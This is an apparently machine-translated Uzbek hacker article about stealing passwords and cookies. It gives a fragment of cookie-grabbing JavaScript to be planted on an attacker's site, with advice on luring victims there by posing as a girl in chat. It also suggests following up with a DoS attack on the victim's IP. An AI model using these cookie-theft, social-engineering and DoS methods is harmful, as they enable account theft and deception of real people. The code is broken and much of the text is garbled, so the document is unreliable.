Yomon parollar uchun eng yaxshi dasturlar. Biz qo'shimcha proksi-server va sniffer yordamida mijozlar parollarini yig'amiz

Hacker PHP skriptlari. JS. PERL.
Parollarni o'g'irlash uchun skriptlar
Shunday qilib, ushbu maqolada men sizga parolingizni qanday tiklashingiz va ushbu saytdan istalgan ma'lumotni olishingiz mumkinligini aytaman. "Hacker"ga kerak bo'lgan hamma narsa faqat o'z tomoningizni o'zingiz xohlagan joyga qo'yishdir, aks holda ular sizni u erda o'ziga jalb qiladi. Vaqtimni yo'qotib, ijtimoiy muhandislik haqidagi axlat gaplarni ko'proq eshitaman. Agar siz ijtimoiy muhandislikning yovuz usullarini e'tiborsiz qoldirishni xohlamasangiz yoki siz uchun bularning barchasi bolalarning sincaplari bo'lsa, u holda brauzeringizning yuqori qismiga xoch qo'ying va ushbu maqolaning mavjudligini unuting. Hozirgi vaqtda tizim kodlari va har xil dasturiy ta'minotni tushunish uchun vaqtimiz yo'q, shuningdek, odamlar bilan gaplashishimiz kerak. Ko'pgina xakerlar banklarni, kompyuterlarni, ma'lumotlar bazalarini nafaqat xavfsizlik tizimidagi oqishlar soni tufayli, balki teridagi ijtimoiy muhandislikdan foydalanish uchun ham buzishadi va xaker nafaqat tizimni buzgan, balki josuslik usulidan foydalanib, ko'pincha Internetning eng muhim joylariga kirish huquqiga ega bo'lgan kishi. . Xuddi shu ijtimoiy muhandislik yordami uchun bankning xavfsizlik tizimini buzgan deb atalmish mega xaker Mitnikni bilishni unutmang. Birinchidan, men oddiy foyda oluvchilarning yovuz usulini, keyin esa kompaniyaning ipi kabi global yovuzlikni tushuntiraman. "Hacker" o'lchov uchun juda ko'p pul to'layotganini va uni qanday qilib xarajatsiz topish haqida o'ylashni boshlaganini tushuning, chunki unga cheklovda biron bir manbaga parolsiz ruxsat berilmaydi va sizga kerak bo'lganlar bor. . Endi siz oraliq tomonni yaratasiz va bir tomonda shunga o'xshash kodni kiritasiz!

var cook = show_all_cookies();

document.open("cookie", oshpaz);

document.write("

document.close("cookie");

(Xavfsizlik nuqtai nazaridan skript biroz o'zgartirildi) Endi siz faqat jabrlanuvchini saytga jalb qilishingiz mumkin, so'ngra "OK" tugmasini bosgandan so'ng "Sizga xayrli kun" xabari bilan uchib chiqishingiz mumkin, sizning cookie fayllaringiz tajovuzkorga yuboriladi. , unda siz foydalanayotgan xizmatlar uchun IP manzillaringiz va parollaringiz haqida ko'p narsalarni o'z ichiga oladi.

Shunchaki cookie-fayllarni yoqish orqali siz ko'plab ma'lumotlarga kirishingiz mumkin. Yovuz odam qasam ichadigan hamma narsa o'zlarining shirin nurlarini yoritadiganlardir, lekin ayni paytda juda ko'p bepul pochta skrinshotlari mavjud, ammo bu unchalik xavfli emas. Quti hujumni amalga oshirish uchun yaratilgan va keyin u qulab tushadi yoki tashlab ketiladi va hujumchi endi noma'lum. Agar xohlasangiz, ushbu skriptni js kengaytmalari bilan faylga yozib, yordam uchun veb-saytga kiritishingiz mumkin

O'z hissangizni qo'shing!

Kimning ko'rinishi endi yoqimli emas. Qanday qilib jabrlanuvchini saytingizga jalb qilish mumkin? Shunday qilib, aqldan ozishning juda ko'p usullari mavjud, masalan, siz chatga kirasiz va jabrlanuvchini tanlaysiz, jabrlanuvchi bilan bir oz vaqt gaplashganingizdan so'ng, siz ularni to'lashingiz mumkin, ayniqsa sizning qurboningiz sizning holatingizga o'xshash bo'lsa. . Amaliyot shuni ko'rsatadiki, agar siz ko'pincha suhbatda siz qiz sifatida namoyon bo'lsangiz, albatta sizni qiz sifatida tavsiflaydigan narsani tanlaysiz (nima yozishni hal qilishda. So'zlaringizni shunday tugatmang. Agar siz o'zingizni qiz bo'lib ko'rsatgan bo'lsangiz, unda bitta bo'l). Mo'ylov qiz bilan gaplashayotganini hamma tushundi. Esingizda bo'lsin, jabrlanuvchini bosmaslik yaxshiroqdir, lekin, masalan, "sizda mening suratingiz bormi, http://site.ru manzilida, xohlaganingizcha boring" deb so'rang. Har bir yigit o'zining kasalligi qanday ko'rinishini va uni sahifangizga qanday qo'yish kerakligini bilib oladi, tortmasiga kiring va kukilaringizni oling. Hammasi shu, endi siz ularni o'rganishingiz kerak va siz o'zingiz xohlagan deyarli hamma narsani topasiz, xuddi shu tarzda siz proksi-serverlardan foydalanadigan odamning IP-manzilini topishingiz mumkin va agar siz IP-ni bilsangiz, keyin tekshirishingiz mumkin. uni umumiy manbalarda va Dos hujumini amalga oshiring yoki shunchaki bola kabi suhbatni qoldiring. Shuningdek, siz ushbu qo'shimcha sayt bilan, masalan, ushbu qo'shimcha skript bilan shunchaki dam olishingiz mumkin:

uchun (I=1; I

Muzlab qoladi